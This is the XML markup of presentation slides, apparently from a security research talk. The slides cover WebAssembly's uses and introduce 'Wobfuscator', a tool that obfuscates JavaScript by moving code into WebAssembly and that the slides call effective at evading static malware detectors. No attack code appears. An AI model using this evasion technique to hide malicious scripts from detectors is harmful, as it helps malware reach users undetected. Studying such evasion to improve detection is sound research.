            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8542181" y="2716869"/>
              <a:ext cx="222218"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1" name="Google Shape;261;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8542181" y="2845162"/>
              <a:ext cx="366492"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2" name="Google Shape;262;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8443629" y="2965703"/>
              <a:ext cx="288547"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3" name="Google Shape;263;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8351054" y="3097891"/>
              <a:ext cx="381122"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32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8351054" y="3226243"/>
              <a:ext cx="288547"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5" name="Google Shape;265;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8409946" y="3340731"/>
              <a:ext cx="381122"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6" name="Google Shape;266;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8502521" y="3475800"/>
              <a:ext cx="366492"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67" name="Google Shape;267;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1476295" y="3632821"/>
            <a:ext cx="840536" cy="340207"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1965632" h="638099" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="638099"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="343829" y="632523"/>
                  <a:pt x="687659" y="626948"/>
                  <a:pt x="1003610" y="526587"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1319561" y="426226"/>
                  <a:pt x="1745166" y="117709"/>
                  <a:pt x="1895707" y="35934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2046248" y="-45841"/>
                  <a:pt x="1906858" y="37793"/>
                  <a:pt x="1906858" y="35934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1906858" y="34075"/>
                  <a:pt x="1901282" y="29428"/>
                  <a:pt x="1895707" y="24782"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3061B2"/>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8" name="Google Shape;268;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104248" y="3224611"/>
            <a:ext cx="1831698"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C,C++,Rust</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5303520" y="3546449"/>
            <a:ext cx="3200400" cy="548640"/>
            <a:chOff x="4899649" y="1018658"/>
            <a:chExt cx="3200400" cy="548640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="270" name="Google Shape;270;p32"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4899649" y="1079021"/>
              <a:ext cx="457215" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="271" name="Google Shape;271;p32"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5549944" y="1027667"/>
              <a:ext cx="548640" cy="517357"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="272" name="Google Shape;272;p32"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6179809" y="1018658"/>
              <a:ext cx="548640" cy="548640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="273" name="Google Shape;273;p32"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6911329" y="1073529"/>
              <a:ext cx="457200" cy="457174"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="274" name="Google Shape;274;p32"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId7">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7642849" y="1068767"/>
              <a:ext cx="457200" cy="451538"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699419" y="1920240"/>
            <a:ext cx="1055097" cy="48013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Image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Recognition</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;276;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5851635" y="1264884"/>
            <a:ext cx="68800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Games</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7713917" y="1237975"/>
            <a:ext cx="385042"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VR</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="278" name="Google Shape;278;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948721" y="1109618"/>
            <a:ext cx="548640" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="279" name="Google Shape;279;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5136816" y="1133538"/>
            <a:ext cx="548640" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="280" name="Google Shape;280;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5150779" y="1854588"/>
            <a:ext cx="548640" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="2468880"/>
            <a:ext cx="38801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C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Client-Side Programming Language</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006864" y="2473445"/>
            <a:ext cx="34937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C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>High-Performance Computations</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581672" y="1920240"/>
            <a:ext cx="965329" cy="48013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Scientific</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Simulation</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4768616" y="4389120"/>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C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Major Browser Support since Nov 2017</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467380" y="4389120"/>
            <a:ext cx="42062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C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Compilation Target for Other Languages</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2297478" y="3442064"/>
            <a:ext cx="2057400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000000: 0061 736d 0100 0000 01b5 0cbe 0160 017f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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000010: 0060 057f 7f7e 7f7f 0060 027f 7f01 7f60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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000020: 057f 7f7f 7f7f 0060 017f 017f 6003 7f7f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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000030: 7f01 7f60 047f 7f7f 7f01 7f60 037f 7f7f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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000040: 0060 0001 7f60 027f 7f00 6006 7f7f 7f7f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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000050: 7f7f 017f 6000 0060 027f 7d00 6001 7f01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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000060: 7d60 067f 7f7f 7f7f 7f00 6004 7f7f 7f7f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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000070: 0060 077f 7f7f 7f7f 7f7f 017f 6001 7f01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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000080: 7e60 047f 7f7f 7d00 6006 7f7d 7d7d 7d7f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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>00000090: 0060 027f 7c01 7c60 017c 017c 6002 7c7c</a:t>
            </a:r>
            <a:endParaRPr sz="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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2396112" y="3144618"/>
            <a:ext cx="1831698"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WebAssembly</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Google Shape;288;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId11">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6989183" y="1898309"/>
            <a:ext cx="548640" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="289" name="Google Shape;289;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId12">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323096" y="-4739"/>
            <a:ext cx="731520" cy="7305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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="267625"/>
            <a:ext cx="8520600" cy="507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 sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Wobfuscator</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1285100"/>
            <a:ext cx="8520600" cy="3398109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" marR="0" lvl="0" indent="-320040" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="595959"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscating JavaScript by moving parts of code to WebAssembly</a:t>
            </a:r>
            <a:endParaRPr sz="2200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" marR="0" lvl="0" indent="-320040" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="595959"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Effective at evading static malware detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" marR="0" lvl="0" indent="-320040" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="595959"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Preserve the semantics of the original code</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" marR="0" lvl="0" indent="-320040" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="595959"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
